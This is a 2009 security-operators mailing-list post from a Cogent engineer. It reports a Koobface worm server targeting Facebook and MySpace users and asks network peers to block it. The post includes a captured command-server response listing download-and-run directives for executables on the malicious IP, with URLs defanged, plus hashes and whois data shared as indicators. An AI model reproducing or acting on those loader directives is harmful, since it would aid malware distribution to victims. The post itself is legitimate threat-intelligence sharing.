[nsp-sec] Attn: AS9394 | 61.235.117.83 - Koobface worm [Effecting Facebook & MySpace]
Shelton, Steve
sshelton at Cogentco.com
Thu Sep 10 09:34:59 EDT 2009
All,
I came across a few sites that were redirecting to what appears to be
related to Koobface worm payloads effecting Facebook and MySpace users.
Can someone proxy this Facebook & MySpace? Any CERT's or rep's for
AS9394 that can negate the content on 61.235.117.83?
--- 09/10/09 07:12:30 Mountain Daylight Time
--- reading URL http://www. [Redacted] /.sys/?action=ldgen&v=14
--- contacting host www. [Redacted] [x.x.x.161] on port 80
HTTP/1.1 200 OK
Date: Thu, 10 Sep 2009 13:12:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.2
Content-Length: 307
Connection: close
Content-Type: text/html
#BLACKLABEL
#GEO=US
#IP=[Redacted]
#noparam
#PID=6145
STARTONCE|hxxp://61.235.117.83/bin/v2prx.exe [Example output below]
STARTONCE|hxxp://61.235.117.83/bin/pp.12.exe
WAIT|60
STARTONCEIMG|hxxp://61.235.117.83/bin/p.jpg|193854730d993dfgdfjkng345
START|hxxp://61.235.117.83/bin/v2webserver.exe
MD5|890394a3e971de7f3c7643db7e5543b5
http://wepawet.iseclab.org/view.php?hash=666945506e9f8c217f5a1a9af85d6ff
a&t=1252588386&type=js
http://www.virustotal.com/analisis/497fe611aa93431a34cae1a5dcde7193907ea
412a439c94353a472968118d647-1252548340
whois.cymru.com [2009-09-10 12:47:16 +0000]
9394 | 61.235.117.83 | CRNET CHINA RAILWAY Internet(CRNET)
peer-whois.cymru.com [2009-09-10 12:47:16 +0000]
4134 | 61.235.117.83 | CHINANET-BACKBONE No.31,Jin-rong Street
6453 | 61.235.117.83 | GLOBEINTERNET TATA Communications
Best regards,
Steve Shelton
Security Engineer
Cogent Communications
More information about the nsp-security
mailing list